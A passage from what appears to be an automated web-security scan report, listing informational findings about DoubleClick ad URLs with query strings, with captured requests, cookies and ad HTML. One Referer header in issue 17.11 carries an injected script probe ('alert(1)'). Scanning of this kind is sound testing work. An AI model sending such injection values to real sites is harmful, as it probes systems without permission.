http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?

The response contains the following links to other domains:

http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6464
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.farmers.com/landing/personal_insurance.html?SourceID=UFDC001L001"><img src="http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

17.10. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.270604.B3/B5112048

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?

The response contains the following links to other domains:

http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=6957132&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=6957132&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.farmers.com/landing/personal_insurance.html?SourceID=UFDC001L001"><img src="http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=6957132&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

17.11. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.TribalFusion.com/B5132291.17

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17;sz=728x90;click=http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=1186282371?

The response contains the following links to other domains:

http://s0.2mdn.net/2676519/virgin_mifi_40unltd_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3740.TribalFusion.com/B5132291.17;sz=728x90;click=http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=1186282371? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 16:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5415

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/http://www.virginmobileusa.com/mobile-broadband/mifi-2200.html?cid=DDR11_bnr_tribal_broadbanddetail_broadband"><img src="http://s0.2mdn.net/2676519/virgin_mifi_40unltd_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349
http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5295
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
71071&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

17.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740
http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401740&migRandom=6953850&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
53850&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401740&migRandom=6953850&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740"></script>
...[SNIP]...

17.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349
http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:14:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5295

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
08100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

17.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763
http://s0.2mdn.net/2782903/ATT_BBTorch160x600.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40400763&migRandom=7532183&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
32183&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch160x600.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40400763&migRandom=7532183&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763"></script>
...[SNIP]...

17.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508
http://s0.2mdn.net/2782903/EVO_Shift_4G160x600.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40401508&migRandom=4959045&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
59045&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G160x600.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40401508&migRandom=4959045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508"></script>
...[SNIP]...

17.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793
http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=1148732&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:51:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
48732&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=1148732&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
